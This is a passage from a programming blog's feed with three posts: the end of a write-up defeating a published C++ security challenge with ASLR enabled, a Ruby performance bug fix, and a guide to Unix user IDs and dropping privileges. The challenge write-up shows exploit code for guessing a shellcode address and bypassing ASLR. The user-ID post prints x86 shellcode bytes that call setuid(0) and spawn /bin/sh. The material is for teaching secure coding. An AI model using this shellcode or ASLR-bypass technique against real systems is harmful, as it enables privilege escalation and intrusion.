<h2>Controlling <code>this</code> to cause arbitrary code to execute</h2>
<p>Take a look at an important piece of code in the challenge:</p>
<pre class="prettyprint">
struct imetad {
  int msg_length;
  int (*callback)(int, struct imetad *);
/* ... */
</pre>
<p>
<p>Nice! The <code>callback</code> field of <code>struct imetad</code> is offset by 4 bytes into the structure. The <code>type</code> field of <code>class Obj</code> is also offset by 4 bytes. See where I&#8217;m going?</p>
<p>If we can control the <code>this</code> pointer to point at the <code>struct imetad</code> on the heap when <code>parse_stream</code> is called, it will overwrite the <code>callback</code> pointer. We&#8217;ll then be able to set the pointer to any address we want and hand-off execution to arbitrary code!</p>
<p>But how can we manipulate <code>this</code>?</p>
<p>Take a look at this piece of code that calls <code>callback</code>:</p>
<pre class="prettyprint">
o[i].parse_stream(dword, stream_temp);
imd->callback(o[i].type, imd);
</pre>
<p>
<p>Since it is possible to overflow <code>new</code> and allocate fewer objects than <code>safe_count</code> is counting, that means that for some values of i, <i><code>o[i]</code> will be pointing at data that isn&#8217;t actually an <code>Obj</code> object, but just other data on the heap</i>. Infact, when <code>i = 2</code>, <b><code>o[i]</code> will be pointing at the <code>struct imetad</code> object on the heap</b>. The call to <code>parse_stream</code> will pass in a corrupted <code>this</code> pointer, that points at <code>struct imetad</code>. The write to <code>type</code> will actually overwrite <code>callback</code> since they are both offset equal amounts into their respective structures.</p>
<p>And with that, we&#8217;ve successfully exploited the challenge causing arbitrary code to execute.</p>
<p>Let&#8217;s now figure out how to beat ASLR!</p>
<h2>How to defeat address space layout randomization</h2>
<p>I <b>did NOT</b> invent this technique, but I read about it and thought it was cool. You can read a more verbose explanation of this technique <a href="http://sophsec.com/research/aslr_research.html">here</a>. The idea behind the technique is pretty simple:
</p>
<ul>
<li>When you call <code>exec</code>, the PID remains the same, but the image of the process in memory is changed.</li>
<li>The kernel uses the PID and the number of jiffies (jiffies is a fine-grained time measurement in the kernel) to pull data from the entropy pool.</li>
<li>If you can run a program which records stack, heap, and other addresses and then quickly call <code>exec</code> to start the vulnerable program, you can end up with the <b>same memory layout</b>.</li>
</ul>
<p>My exploit program is actually a <i>wrapper</i> which records an approximate location of the heap (by just calling <code>malloc()</code>), generates the exploit file, and then executes the challenge binary.</p>
<p>Take a look at the relevant pieces of my exploit to get an idea of how it works:
<pre class="prettyprint">
/* ... */

/* do a malloc to get an idea of where the heap lives */
void *dummy = malloc(10);

/* ... */

unsigned int shell_addr = reinterpret_void_ptr_as_uint(dummy);

/*
 * XXX TODO FIXME - on my platform, execl'ing from here to the challenge binary
 * incurs a constant offset of 0x3160, probably for changes in the environment
 * (libs linked for c++ and whatnot).
 */
shell_addr += 0x3160;

/*
 * a guess as to how far off the heap the shellcode lives.
 *
 * luckily we have a large NOP sled, so we should only fail when we miss
 * the current entropy cycle (see below).
 */
shell_addr += 700;

/* ... build exploit file in memory ... */

/* copy in our best guess as to the address of the shellcode, pray NOPs
 * take care of the rest! */
memcpy(entire_file+88, &#038;shell_addr, sizeof(shell_addr));

/* ... write exploit out to disk ... */

/* launch program with the generated exploit file!
*
* calling execl here inherits the PID of this process, and IF we get lucky
* ~85%+ of the time, we'll execute before the next entropy cycle and hit
* the shellcode, even with ASLR=2.
*/
execl("./cpp_challenge", "cpp_challenge", "exploit", (char *)0);
</pre>
<h2>My exploit for the C++ challenge</h2>
<p>My exploit comes with the following caveats:</p>
<ul>
<li>i386 system</li>
<li>The challenge binary is called &#8220;cpp_challenge&#8221; and lives in the same directory as the exploit binary.</li>
<li>The exploit binary can write to the directory and create a file called &#8220;exploit&#8221; which will be handed off to &#8220;cpp_challenge&#8221;</li>
</ul>
<p>Get the full code of my exploit <a href="http://timetobleed.com/files/exploit_gen.c">here</a>.</p>
<h2>Results</h2>
<p>Results on my i386 Ubuntu 8.04 VM running in VMWare fusion, for each level of randomize_va_space:</p>
<ul>
<li>0 &#8211; <b>100%</b> exploit hit rate</li>
<li>1 &#8211; <b>100%</b> exploit hit rate</li>
<li>2 &#8211; <b>~85%</b> exploit hit rate. Sometimes, my exploit code falls out of the time window and the address map changes before the challenge binary is run</li>
</ul>
<p>I could probably boost the hit rate for 2 a bit, but then I&#8217;d probably re-write the entire exploit in assembly to make it run as fast as possible. I didn&#8217;t think there was really a point to going to such an extreme, though. So, an 85% hit rate is good enough.</p>
<h2>Conclusion</h2>
<ol>
<li>Security challenges are fun.</li>
<li>More emphasis and more freely available information on secure coding would be very useful.</li>
<li>Like it or not developers need to be security conscious when writing code in C and C++.</li>
<li>As C and C++ change, developers need to carefully consider security implications of new features.</li>
</ol>
<p>
Thanks for reading and don&#8217;t forget to <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>References</h2>
<ol class="footnotes"><li id="footnote_0_1152" class="footnote"><a href="http://chargen.matasano.com/chargen/2009/10/9/a-c-challenge.html">Matasano Security LLC &#8211; Chargen &#8211; A C++ Challenge</a></li><li id="footnote_1_1152" class="footnote"><a href="http://blogs.msdn.com/oldnewthing/archive/2004/01/29/64389.aspx">Integer overflow in the new[] operator</a></li></ol>]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/defeating-the-matasano-c-challenge-with-aslr-enabled/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Fix a bug in Ruby&#8217;s configure.in and get a ~30% performance boost.</title>
		<link>http://timetobleed.com/fix-a-bug-in-rubys-configurein-and-get-a-30-performance-boost/</link>
		<comments>http://timetobleed.com/fix-a-bug-in-rubys-configurein-and-get-a-30-performance-boost/#comments</comments>
		<pubDate>Tue, 05 May 2009 08:20:29 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[bugfix]]></category>
		<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[scaling]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>
		<category><![CDATA[debug]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patches]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[strace]]></category>
		<category><![CDATA[syscall]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[threading]]></category>
		<category><![CDATA[threads]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=615</guid>
		<description><![CDATA[Special thanks&#8230; Going out to Jake Douglas for pushing the initial investigation and getting the ball rolling. The whole --enable-pthread thing Ask any Ruby hacker how to easily increase performance in a threaded Ruby application and they&#8217;ll probably tell you: Yo dude&#8230; Everyone knows you need to configure Ruby with --disable-pthread. And it&#8217;s true; configure [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/ruby_bug.jpg"/></center><br />
</p>
<p>
<h2>Special thanks&#8230;</h2>
<p>Going out to <a href="http://twitter.com/jakedouglas">Jake Douglas</a> for pushing the initial investigation and getting the ball rolling.</p>
<p><h2>The whole <code>--enable-pthread</code> thing</h2>
<p>Ask any Ruby hacker how to easily increase performance in a threaded Ruby application and they&#8217;ll probably tell you:<br />
<b><br />
Yo dude&#8230; <i>Everyone</i> knows you need to <code>configure</code> Ruby with <code>--disable-pthread</code>.<br />
</b><br />
And it&#8217;s true; <code>configure</code> Ruby with <code>--disable-pthread</code> and you get a ~30% performance boost. But&#8230; <b><i>why?</i></b></p>
<p> For this, we&#8217;ll have to turn to our handy tool <a href="http://timetobleed.com/hello-world/">strace</a>. We&#8217;ll also need a simple Ruby program to this one. How about something like this:</p>
<p>
<pre class="prettyprint lang-rb">
def make_thread
  Thread.new {
    a = []
    10_000_000.times {
      a << "a"
      a.pop
    }
  }
end

t = make_thread
t1 = make_thread 

t.join
t1.join</pre>
<p></p>
<p>Now, let's run <code>strace</code> on a version of Ruby <code>configure</code>'d with <code>--enable-pthread</code> and point it at our test script. The output from <code>strace</code> looks like this:</p>
<p>
<pre class="prettyprint lang-c">
22:46:16.706136 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706177 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706218 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706259 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000005>
22:46:16.706301 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706342 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706383 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706425 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706466 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004></pre>
<p></p>
<p><b>Pages and pages and pages</b> of sigprocmask system calls (Actually, running with <code>strace -c</code>, I get about <b>20,054,180</b> calls to <code>sigprocmask</code>, <b>WOW</b>). Running the <i>same test script</i> against a Ruby built with <code>--disable-pthread</code> and the output does <b>not</b> have pages and pages of <code>sigprocmask</code> calls (only <b>3</b> times, a <b>HUGE</b> reduction).
</p>
<p><h2>OK, so let's just set a breakpoint in GDB... right?</h2>
<p>OK, so we should just be able to set a <code>breakpoint</code> on <code>sigprocmask</code> and figure out who is calling it.</p>
<p><b>Well, not exactly.</b> You can try it, but the breakpoint <b>won't trigger</b> (we'll see why a little bit later).</p>
<p>Hrm, that kinda sucks and is confusing. This will make it harder to track down who is calling <code>sigprocmask</code> in the threaded case.</p>
<p> Well, we know that when you run <code>configure</code> the script creates a <code>config.h</code> with a bunch of <code>define</code>s that Ruby uses to decide which functions to use for what. So let's compare <code>./configure --enable-pthread</code> with <code>./configure --disable-pthread</code>:</p>
<pre class="prettyprint lang-bsh">
[joe@mawu:/home/joe/ruby]% diff config.h config.h.pthread
> #define _REENTRANT 1
> #define _THREAD_SAFE 1
> #define HAVE_LIBPTHREAD 1
> #define HAVE_NANOSLEEP 1
> #define HAVE_GETCONTEXT 1
> #define HAVE_SETCONTEXT 1</pre>
</p>
<p>
<br />
OK, now if we <code>grep</code> the Ruby source code, we see that whenever <code>HAVE_[SG]ETCONTEXT</code> are set, Ruby uses the system calls <code>setcontext()</code> and <code>getcontext()</code> to save and restore state for context switching and for exception handling (via the <code>EXEC_TAG</code>). </p>
<p>What about when <code>HAVE_[SG]ETCONTEXT</code> are <b>not</b> <code>define</code>'d? Well in that case, Ruby uses <code>_setjmp/_longjmp</code>.</p>
<p><b>Bingo!</b></p>
<p>That's what's going on! From the <code>_setjmp/_longjmp</code> man page:</p>
<blockquote><p>... The _longjmp()  and  _setjmp()  functions  shall  be  equivalent  to  longjmp() and setjmp(), respectively, with the additional restriction that _longjmp() and _setjmp() shall not manipulate the signal mask...</p></blockquote>
<p>And from the <code>[sg]etcontext</code> man page:</p>
<blockquote><p>... uc_sigmask is the set of signals blocked in this context (see sigprocmask(2)) ...</p></blockquote>
<p>
<br />The issue is that <code>getcontext</code> calls <code>sigprocmask</code> on <b>every invocation</b> but <code>_setjmp</code> does not.</p>
<p><b>BUT WAIT</b> if that's true why didn't <code>GDB</code> hit a <code>sigprocmask</code> breakpoint before?</p>
<p><h2>x86_64 assembly FTW, again</h2>
</p>
<p>
Let's fire up <code>gdb</code> and figure out this breakpoint-not-breaking thing. First, let's start by disassembling <code>getcontext</code> (snipped for brevity):<br />
<code><br />
(gdb) p getcontext<br />
$1 = {<text variable, no debug info>} 0x7ffff7825100 <getcontext><br />
(gdb) disas getcontext<br />
...<br />
0x00007ffff782517f <getcontext+127>:	mov    $0xe,%rax<br />
0x00007ffff7825186 <getcontext+134>:	syscall<br />
...<br />
</code></p>
<p>Yeah, that's pretty weird. I'll explain why in a minute, but let's look at the disassembly of <code>sigprocmask</code> first:<br />
<code><br />
(gdb) p sigprocmask<br />
$2 = {<text variable, no debug info>} 0x7ffff7817340 <__sigprocmask><br />
(gdb) disas sigprocmask<br />
...<br />
0x00007ffff7817383 <__sigprocmask+67>:	mov    $0xe,%rax<br />
0x00007ffff7817388 <__sigprocmask+72>:	syscall<br />
...<br />
</code><br />
Yeah, this is a bit confusing, but here's the deal.</p>
<p>
Recent Linux kernels implement a shiny new method for calling system calls called <code>sysenter/sysexit</code>. This new way was created because the old way (<code>int $0x80</code>) turned out to be pretty slow. So Intel created some new instructions to execute system calls without such huge overhead.</p>
<p> All you need to know right now (I'll try to blog more about this in the future) is that the <code>%rax</code> register holds the system call number. The <code>syscall</code> instruction transfers control to the kernel and the kernel figures out which syscall you wanted by checking the value in <code>%rax</code>. Let's just make sure that <code>sigprocmask</code> is actually 0xe:</p>
<pre class="prettyprint lang-c">
[joe@pluto:/usr/include]% grep -Hrn "sigprocmask" asm-x86_64/unistd.h
asm-x86_64/unistd.h:44:#define __NR_rt_sigprocmask                     14</pre>
<p>
<br />
<b>Bingo. It's calling <code>sigprocmask</code> (albeit a bit obscurely).</b></p>
<p>
OK, so <code>getcontext</code> isn't calling <code>sigprocmask</code> directly, instead it replicates a bunch of code that <code>sigprocmask</code> has in its function body. That's why we didn't hit the <code>sigprocmask</code> breakpoint; <code>GDB</code> was going to break if you landed on the address <code>0x7ffff7817340</code> but <b>you didn't</b>. </p>
<p>Instead, <code>getcontext</code> reimplements the wrapper code for <code>sigprocmask</code> itself and <code>GDB</code> is none the wiser. </p>
<p><b>Mystery solved</b>.</p>
<p><h2>The patch</h2>
</p>
<p>
Get it <b><a href="http://github.com/ice799/matzruby/commit/0b9b69f9653782a33aee2b8937d405eae245b60c">HERE</a></b></p>
<p>
The patch works by adding a new configure flag called <code>--disable-ucontext</code> to allow you to specifically disable <code>[sg]etcontext</code> from being called, you <b>use this in conjunction with</b> <code>--enable-pthread</code>, like this:<br />
<code><br />
./configure --disable-ucontext --enable-pthread</code><br />
<br />
After you build Ruby configured like that, its performance is on par with (and sometimes slightly faster) than Ruby built with <code>--disable-pthread</code> for about a 30% performance boost when compared to <code>--enable-pthread</code>.</p>
<p>I added the switch because I wanted to preserve the original Ruby behavior, if you just pass <code>--enable-pthread</code> <b>without</b> <code>--disable-ucontext</code></b> Ruby will do the old thing and generate piles of sigprocmasks.</p>
<h2>Conclusion</h2>
<ol>
<li> Things aren't always what they seem - GDB may lie to you. Be careful. </li>
<li> Use the source, Luke. Libraries can do unexpected things, debug builds of libc can help!</li>
<li> I know I keep saying this, assembly is useful. Start learning it today!</li>
</ol>
<p>
If you enjoyed this blog post, consider <a href="http://feeds.feedburner.com/TimeToBleed" rel="alternate" type="application/rss+xml">subscribing (via RSS)</a> or <a href="http://twitter.com/joedamato">following (via twitter)</a>.</p>
<p><b>You'll want to stay tuned; <a href="http://twitter.com/tmm1">tmm1</a> and I have been on a roll the past week. Lots of cool stuff coming out!</b></p>
]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/fix-a-bug-in-rubys-configurein-and-get-a-30-performance-boost/feed/</wfw:commentRss>
		<slash:comments>45</slash:comments>
		</item>
		<item>
		<title>5 Things You Don&#8217;t Know About User IDs That Will Destroy You</title>
		<link>http://timetobleed.com/5-things-you-dont-know-about-user-ids-that-will-destroy-you/</link>
		<comments>http://timetobleed.com/5-things-you-dont-know-about-user-ids-that-will-destroy-you/#comments</comments>
		<pubDate>Mon, 13 Apr 2009 17:06:33 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[monitoring]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[privilege escalation]]></category>
		<category><![CDATA[privileges]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=419</guid>
		<description><![CDATA[*nix user and group IDs are complicated, confusing, and often misused. Look at this code snippet from the popular Ruby project, Starling: def drop_privileges &#160; Process.egid = options&#91;:group&#93; if options&#91;:group&#93; &#160; Process.euid = options&#91;:user&#93; if options&#91;:user&#93; end At quick first glance, you might think this code looks OK. But you&#8217;d be wrong. Let&#8217;s take a [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/jail.jpg"/></center><br />
</p>
<p>
*nix user and group IDs are complicated, confusing, and often misused. Look at this code snippet from the popular Ruby project, <a href="http://github.com/starling/starling/blob/e958961c4d92e8c30d23ee4c6759021748d7578c/lib/starling/server_runner.rb#L184">Starling</a>: </p>
<div class="dean_ch" style="white-space: wrap;">
<span class="kw1">def</span> drop_privileges<br />
&nbsp; <span class="kw4">Process</span>.<span class="me1">egid</span> = options<span class="br0">&#91;</span><span class="re3">:group</span><span class="br0">&#93;</span> <span class="kw1">if</span> options<span class="br0">&#91;</span><span class="re3">:group</span><span class="br0">&#93;</span><br />
&nbsp; <span class="kw4">Process</span>.<span class="me1">euid</span> = options<span class="br0">&#91;</span><span class="re3">:user</span><span class="br0">&#93;</span> <span class="kw1">if</span> options<span class="br0">&#91;</span><span class="re3">:user</span><span class="br0">&#93;</span><br />
<span class="kw1">end</span></div>
<p></p>
<p>At quick first glance, you might think this code looks OK. But you&#8217;d be <b>wrong</b>.</p>
<p>Let&#8217;s take a look at 5 things you <i>probably</i> don&#8217;t know about user and group IDs that can lead you to your downfall.</p>
<ol>
<h2>
<li>The difference between real, effective, and saved IDs</li>
</h2>
<p>This is always a bit confusing, but without a solid understanding of this concept you are doomed later.</p>
<ul>
<li>Real ID &#8211; The real ID is the ID of the process that created the current process. So, let&#8217;s say you log in to your box as <i>joe</i>, your shell is then launched with its real ID set to <i>joe</i>. All processes you start from your shell will inherit the real ID <i>joe</i> as their real ID.</li>
<li>Effective ID &#8211; The effective ID is the ID that the system uses to determine whether a process can take a particular action. There are two popular ways to change your effective ID:</li>
<ul>
<li><code>su</code> &#8211; the <code>su</code> program changes your effective, real, and saved IDs to the ID of the user you are switching to.</li>
<li>set ID upon execute (abbreviated setuid) &#8211; You can mark a program&#8217;s <i>set uid upon execute bit</i> so that the program runs with its effective and saved ID set to the <i>owner</i> of the program (which may not necessarily be you). The real ID will remain untouched. For example, if you have a program:
<p>
<div class="dean_ch" style="white-space: wrap;">
&#8230;<br />
<span class="me1">rv</span> = getresuid<span class="br0">&#40;</span>&amp;ruid, &amp;euid, &amp;suid<span class="br0">&#41;</span>;<br />
&#8230;<br />
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a><span class="br0">&#40;</span><span class="st0">&quot;ruid %d, euid %d, suid %d<span class="es0">\n</span>&quot;</span>, ruid, euid, suid<span class="br0">&#41;</span>;</div>
</p>
<p>
<p>If you then <code>chown</code> the program as root and <code>chmod +s</code> (which turns on the setuid bit), the program will print:</p>
<pre>ruid 1000, euid 0, suid 0</pre>
</p>
<p>
<p>
when it is run (assuming your user ID is 1000).</p>
</li>
</ul>
<li>Saved ID &#8211; The saved ID is set to the effective ID when the program starts. This exists so that a program can regain its original effective ID after it drops its effective ID to an unprivileged ID. This use-case can cause problems (as we&#8217;ll see soon) if it is not correctly managed.</li>
</ul>
<ul>
<li>If you start a program as yourself, and it does not have its <i>set ID upon execute bit</i> set, then the program will start running with its real, effective, and saved IDs set to your user ID.</li>
<li>If you run a setuid program, your real ID remains unchanged, but your effective and saved IDs are set to the owner of the file.</li>
<li><code>su</code> does the same as running a setuid program, but it also changes your real ID.</li>
</ul>
<h2>
<li>Don&#8217;t use Process.euid= in Ruby; stay as far away as possible</li>
</h2>
<ul>
<li>Process.euid= is <b>EXTREMELY platform specific</b>. It might do any of the following:</p>
<ul>
<li>Set just your effective ID</li>
<li>Set your effective, real, and saved ID.</li>
</ul>
<p>On most recent Linux kernels, Process.euid= changes <b><u>ONLY</u></b> the Effective ID. In most cases, this is <u><b>NOT</b></u> what you want. Check out <a href="https://gist.github.com/4acbe14306e86001e193">this sample Ruby script</a>. What would happen if you ran this script as root? </li>
<div class="dean_ch" style="white-space: wrap;">
<span class="kw1">def</span> write_file<br />
&nbsp; <span class="kw1">begin</span><br />
&nbsp; &nbsp; <span class="kw4">File</span>.<span class="kw3">open</span><span class="br0">&#40;</span><span class="st0">&quot;/test&quot;</span>, <span class="st0">&quot;w+&quot;</span><span class="br0">&#41;</span> <span class="kw1">do</span> |f|<br />
&nbsp; &nbsp; &nbsp; f.<span class="me1">write</span><span class="br0">&#40;</span><span class="st0">&quot;hello!<span class="es0">\n</span>&quot;</span><span class="br0">&#41;</span><br />
&nbsp; &nbsp; &nbsp; f.<span class="me1">close</span><br />
&nbsp; &nbsp; <span class="kw1">end</span><br />
&nbsp; &nbsp; <span class="kw3">puts</span> <span class="st0">&quot;wrote test file&quot;</span><br />
&nbsp; <span class="kw1">rescue</span> <span class="re2">Errno::EACCES</span><br />
&nbsp; &nbsp; <span class="kw3">puts</span> <span class="st0">&quot;could not write test file&quot;</span><br />
&nbsp; <span class="kw1">end</span><br />
<span class="kw1">end</span><br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;ok, set uid to nobody&quot;</span><br />
<span class="kw4">Process</span>.<span class="me1">euid</span> = Etc.<span class="me1">getpwnam</span><span class="br0">&#40;</span><span class="st0">&quot;nobody&quot;</span><span class="br0">&#41;</span>.<span class="me1">uid</span><br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;going to try to write to / now&#8230;&quot;</span><br />
&nbsp;<br />
write_file<br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;restoring back to root&quot;</span><br />
&nbsp;<br />
<span class="kw4">Process</span>.<span class="me1">euid</span> = <span class="nu0">0</span><br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;now writing file&quot;</span><br />
&nbsp;<br />
write_file</div>
<p></p>
<p>This might surprise you, but the script <b>regains <code>root</code>&#8216;s ID</b> after it has dropped itself down to <code>nobody</code>.
</p>
<li> Why does this work? </li>
<p>Well as we just said, Process.euid= doesn&#8217;t touch the Saved ID, only the Effective ID. <b>As a result, the effective ID can be set back to the saved ID at any time. The only way to avoid this is to call a different Ruby function as we&#8217;ll see in #4 below.</b>
</ul>
<h2>
<li>Buggy native code running as <code>nobody</code> can execute arbitrary code as <code>root</code> in 8 bytes</li>
</h2>
<ul>
<li>Imagine a Ruby script much like the one above. The script is run as <code>root</code> to do something special (maybe bind to port 80).</li>
<li>The process then drops privileges to <code>nobody</code>.</li>
<li>Afterward, your application interacts with buggy native code in the Ruby interpreter, a Ruby extension, or a Ruby gem.</li>
<li>If that buggy native code can be &#8220;tricked&#8221; into executing arbitrary code, a malicious user can elevate the process up from nobody to root <b>in just 8 bytes.</b> Those 8 bytes are: <i>\x31\xdb\x8d\x43\x17\x99\xcd\x80</i> &#8211; which is a binary representation of setuid(0).</li>
<li>At this point, a malicious user can execute <i>arbitrary code</i> as the <i><code>root</code> user</i></ul>
</ul>
<p>Let&#8217;s take a look at an (abbreviated) code snippet (<a href="http://gist.github.com/92980">full</a> here):</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="co1">## we&#8217;re using a buggy gem</span><br />
<span class="kw3">require</span> <span class="st0">&#8216;badgem&#8217;</span></p>
<p><span class="co1"># do some special operations here as the privileged user</span><br />
&#8230;</p>
<p><span class="co1"># ok, now let&#8217;s (incorrectly) drop to nobody</span><br />
<span class="kw4">Process</span>.<span class="me1">euid</span> = Etc.<span class="me1">getpwnam</span><span class="br0">&#40;</span><span class="st0">&quot;nobody&quot;</span><span class="br0">&#41;</span>.<span class="me1">uid</span></p>
<p><span class="co1"># let&#8217;s take some user input</span><br />
s = <span class="re2">MyModule::GetUserInput</span></p>
<p><span class="co1"># let&#8217;s assume the user is malicious and supplies something like:</span><br />
<span class="co1"># &quot;\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52&quot; +</span><br />
<span class="co1"># &quot;\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80&quot;</span><br />
<span class="co1"># as the string. </span><br />
<span class="co1"># That string is x86_32 linux shellcode for running</span><br />
<span class="co1"># setuid(0); and execve(&quot;/bin/sh&quot;, 0, 0) !</span></p>
<p><span class="co1"># pass that to a buggy Ruby Gem</span><br />
BadGem::bad<span class="br0">&#40;</span>s<span class="br0">&#41;</span></p>
<p><span class="co1"># the user is now sitting in a root shell!!</span></div>
<p>
<p>
	This is obviously <b><u>NOT GOOD.</u></b>
</p>
<h2>
<li> How to change the real, effective, and saved IDs</li>
</h2>
<p>In the list below, I&#8217;m going to list the functions as <code>syscall - RubyFunction</code></p>
<ul>
<li><code>setuid(uid_t uid) - Process::Sys.setuid(integer)</code></li>
<p>This pair of functions always sets the real, effective, and saved user IDs to the value passed in. This is a useful function for permanently dropping privileges, as we&#8217;ll see soon. <b>This is a POSIX function. Use this when possible.</b></p>
<li><code>setresuid(uid_t ruid, uid_t euid, uid_t suid) - Process::Sys.setresuid(rid, eid, sid)</code></li>
<p>This pair of functions allows you to set the real, effective, saved User IDs to arbitrary values, assuming you have a privileged effective ID. Unfortunately, this function <b>is NOT POSIX</b> and is <b>not portable</b>. It does exist on Linux and some BSDs, though.</p>
<li><code>setreuid(uid_t ruid, uid_t eid) - Process::Sys.setreuid(rid, eid)</code></li>
<p>This pair of functions allows you to set the real and effective user IDs to the values passed in. On Linux:
<ul>
<li>A process running with an unprivileged effective ID will only have the ability to set the real ID to the real ID or to the effective ID.</li>
<li>A process running with a privileged effective ID will have its saved ID set to the new effective ID <b>if</b> the real or effective IDs are set to a value which was not the previous real ID.</li>
</ul>
<p><b>This is a POSIX function, but has lots of cases with undefined behavior. Be careful.</b></p>
<li><code>seteuid(uid_t eid) - Process::Sys.seteuid(eid)</code></li>
<p>This pair of functions sets the effective ID of the process but leaves the <b>real and saved IDs unchanged. IMPORTANT: Any process (including those with unprivileged effective IDs) may change their effective ID to their real or saved ID.</b> This is exactly the behavior we saw with the Ruby script in #2 above.<b> This is a POSIX function.</b>
</ul>
<h2>
<li>How to correctly and permanently drop privileges</li>
</h2>
<p>You should use either the:</p>
<ul>
<li><code>setuid(uid_t uid) - Process::Sys.setuid(integer)</code></li>
<p>
or</p>
<li><code>setresuid(uid_t ruid, uid_t euid, uid_t suid) - Process::Sys.setresuid(rid, eid, sid)</code></li>
</ul>
<p>pair of functions to set the real, effective, and saved IDs to the lowest privileged ID possible. On many systems, this is the ID of the user <code>nobody</code>. </p>
<p>For the truly paranoid, it is recommended to check that dropping privileges <i>was actually</i> successful before continuing. For example:</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="kw3">require</span> <span class="st0">&#8216;etc&#8217;</span></p>
<p><span class="kw1">def</span> test_drop<br />
&nbsp; <span class="kw1">begin</span><br />
&nbsp; &nbsp; <span class="re2">Process::Sys</span>.<span class="me1">setuid</span><span class="br0">&#40;</span><span class="nu0">0</span><span class="br0">&#41;</span><br />
&nbsp; <span class="kw1">rescue</span> <span class="re2">Errno::EPERM</span><br />
&nbsp; &nbsp; <span class="kw2">true</span><br />
&nbsp; <span class="kw1">else</span><br />
&nbsp; &nbsp; <span class="kw2">false</span><br />
&nbsp; <span class="kw1">end</span><br />
<span class="kw1">end</span></p>
<p>uid = Etc.<span class="me1">getpwnam</span><span class="br0">&#40;</span><span class="st0">&quot;nobody&quot;</span><span class="br0">&#41;</span>.<span class="me1">uid</span><br />
<span class="re2">Process::Sys</span>.<span class="me1">setuid</span><span class="br0">&#40;</span>uid<span class="br0">&#41;</span></p>
<p><span class="kw1">if</span> !test_drop<br />
&nbsp; <span class="kw3">puts</span> <span class="st0">&quot;Failed!&quot;</span><br />
&nbsp; <span class="co1">#handle error</span><br />
<span class="kw1">end</span></div>
</ol>
<h2>Conclusion</h2>
<p>*nix user and group ID management is confusing, difficult, and extremely error prone. It is a difficult system with many nuances, gotchas, and caveats. It is no wonder so many people make mistakes when trying to write secure code. The major things to keep in mind from this article are:</p>
<ul>
<li>Avoid Process.euid= at <b>all costs.</b></li>
<li>Drop privileges as soon as possible in your application.</li>
<li>Drop those privileges <i>permanently</i>.</li>
<li>Ensure that privileges were correctly dropped.</li>
<li><b>Carefully</b> read and re-read <code>man</code> pages when using the functions listed above.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/5-things-you-dont-know-about-user-ids-that-will-destroy-you/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>a/b test mallocs against your memory footprint</title>
		<link>http://timetobleed.com/ab-test-mallocs-against-your-memory-footprint/</link>
		<comments>http://timetobleed.com/ab-test-mallocs-against-your-memory-footprint/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 01:39:42 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[debugging]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[scaling]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[allocator]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[malloc]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[profiling]]></category>
		<category><![CDATA[system health]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=317</guid>
		<description><![CDATA[The other day at Kickball Labs we were discussing whether linking Ruby against tcmalloc (or ptmalloc3, nedmalloc, or any other malloc) would have any noticeable effect on application latency. After taking a side in the argument, I started wondering how we could test this scenario. We had a couple different ideas about testing: Look at [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/brain.jpg"/></center><br />
